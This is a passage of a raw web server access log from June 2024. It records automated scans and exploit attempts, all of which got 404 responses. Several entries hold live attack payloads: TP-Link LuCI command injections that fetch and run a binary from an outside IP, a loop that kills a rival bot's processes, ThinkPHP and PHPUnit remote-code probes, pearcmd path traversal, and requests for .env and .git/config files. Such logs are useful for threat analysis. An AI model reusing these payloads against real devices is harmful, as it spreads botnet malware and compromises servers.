+0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 149.50.103.48 - - [22/Jun/2024:18:00:57 +0200] "GET / HTTP/1.1" 404 - 78.108.177.50 - - [22/Jun/2024:18:08:43 +0200] "GET / HTTP/1.0" 404 - 87.121.69.27 - - [22/Jun/2024:18:31:55 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 114.119.158.112 - - [22/Jun/2024:18:47:28 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 94.156.71.226 - - [22/Jun/2024:19:01:25 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 149.50.103.48 - - [22/Jun/2024:19:06:55 +0200] "GET / HTTP/1.1" 404 - 80.76.49.105 - - [22/Jun/2024:19:21:55 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 - 10.10.10.51 - - [22/Jun/2024:20:45:48 +0200] "GET / HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:20:47:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:20:47:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 149.50.103.48 - - [22/Jun/2024:20:47:52 +0200] "GET / HTTP/1.1" 404 - 52.167.144.207 - - [22/Jun/2024:20:49:00 +0200] "GET /ticket2/opencms/en/venue/?venueid=3D607064-676F-4AF0-20B6-ACDBA986D231 HTTP/1.1" 200 63610 87.121.69.27 - - [22/Jun/2024:21:02:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 5.182.173.146 - - [22/Jun/2024:21:02:36 +0200] "GET / HTTP/1.1" 404 - 5.10.250.79 - - [22/Jun/2024:21:04:40 +0200] "GET /SetupWizard.aspx/ HTTP/1.1" 404 - 141.98.11.15 - - [22/Jun/2024:21:05:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 147.185.132.204 - - [22/Jun/2024:21:06:15 +0200] "GET / HTTP/1.0" 404 - 34.22.192.129 - - [22/Jun/2024:21:06:29 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.148.10.174 - - [22/Jun/2024:21:09:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [22/Jun/2024:21:09:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 162.142.125.34 - - [22/Jun/2024:21:23:16 +0200] "GET / HTTP/1.1" 404 - 162.142.125.34 - - [22/Jun/2024:21:23:27 +0200] "GET / HTTP/1.1" 404 - 162.142.125.34 - - [22/Jun/2024:21:23:27 +0200] "PRI * HTTP/2.0" 505 - 198.235.24.201 - - [22/Jun/2024:21:41:39 +0200] "GET / HTTP/1.1" 404 - 172.206.139.150 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 4.151.218.216 - - [22/Jun/2024:22:16:26 +0200] "GET /ticket2/opencms/owa/auth/x.js HTTP/1.1" 404 - 45.156.128.45 - - [22/Jun/2024:22:18:01 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 - 35.216.225.22 - - [22/Jun/2024:22:59:21 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 35.216.225.22 - - [22/Jun/2024:22:59:22 +0200] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 - 35.216.225.22 - - [22/Jun/2024:22:59:24 +0200] "GET /ticket2/opencms/config.json HTTP/1.1" 404 - 35.216.225.22 - - [22/Jun/2024:22:59:25 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 35.216.225.22 - - [22/Jun/2024:22:59:25 +0200] "GET /ticket2/opencms/telescope/requests HTTP/1.1" 404 - 35.216.225.22 - - [22/Jun/2024:22:59:26 +0200] "GET /ticket2/opencms/info.php HTTP/1.1" 404 - 87.121.69.27 - - [22/Jun/2024:23:00:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 40.77.167.33 - - [22/Jun/2024:23:13:44 +0200] "GET /ticket2/opencms/en/venue/?venueid=69923349-A528-C93F-2999-4DA35CF7FB58 HTTP/1.1" 200 63648 149.50.103.48 - - [22/Jun/2024:23:23:43 +0200] "GET / HTTP/1.1" 404 - 94.74.151.128 - - [22/Jun/2024:23:27:10 +0200] "GET / HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:18 +0200] "????????)?J?@??-.I???q???pnVk?D ??? ???7?D{??g???m?U??Sb;???&?+?/?,?0????? ??" 400 - 64.225.75.246 - - [22/Jun/2024:23:47:18 +0200] "GET / HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET / HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /server HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /version HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /about HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /v2/_catalog HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:19 +0200] "GET /server-status HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /_all_dbs HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /.DS_Store HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /.env HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /.git/config HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /s/633323e2339313e2630313e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /config.json HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /telescope/requests HTTP/1.1" 404 - 64.225.75.246 - - [22/Jun/2024:23:47:20 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:40 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:40 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:40 +0200] "GET /ticket2/opencms/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:41 +0200] "GET /ticket2/opencms/vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:41 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:42 +0200] "GET /ticket2/opencms/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:43 +0200] "GET /ticket2/opencms/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:44 +0200] "GET /ticket2/opencms/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:44 +0200] "GET /ticket2/opencms/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:45 +0200] "GET /ticket2/opencms/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:46 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:46 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:47 +0200] "GET /ticket2/opencms/lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:47 +0200] "GET /ticket2/opencms/lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:48 +0200] "GET /ticket2/opencms/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:48 +0200] "GET /ticket2/opencms/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:49 +0200] "GET /ticket2/opencms/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:49 +0200] "GET /ticket2/opencms/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:49 +0200] "GET /ticket2/opencms/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:50 +0200] "GET /ticket2/opencms/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:50 +0200] "GET /ticket2/opencms/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:50 +0200] "GET /ticket2/opencms/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:50 +0200] "GET /ticket2/opencms/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:51 +0200] "GET /ticket2/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:51 +0200] "GET /ticket2/opencms/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:52 +0200] "GET /ticket2/opencms/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:52 +0200] "GET /ticket2/opencms/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:52 +0200] "GET /ticket2/opencms/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:52 +0200] "GET /ticket2/opencms/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:53 +0200] "GET /ticket2/opencms/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:53 +0200] "GET /ticket2/opencms/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:54 +0200] "GET /ticket2/opencms/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:55 +0200] "GET /ticket2/opencms/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:55 +0200] "GET /ticket2/opencms/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:56 +0200] "GET /ticket2/opencms/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:57 +0200] "GET /ticket2/opencms/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:58 +0200] "GET /ticket2/opencms/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:59 +0200] "GET /ticket2/opencms/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:51:59 +0200] "GET /ticket2/opencms/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:52:00 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 404 - 79.175.138.68 - - [22/Jun/2024:23:52:01 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 -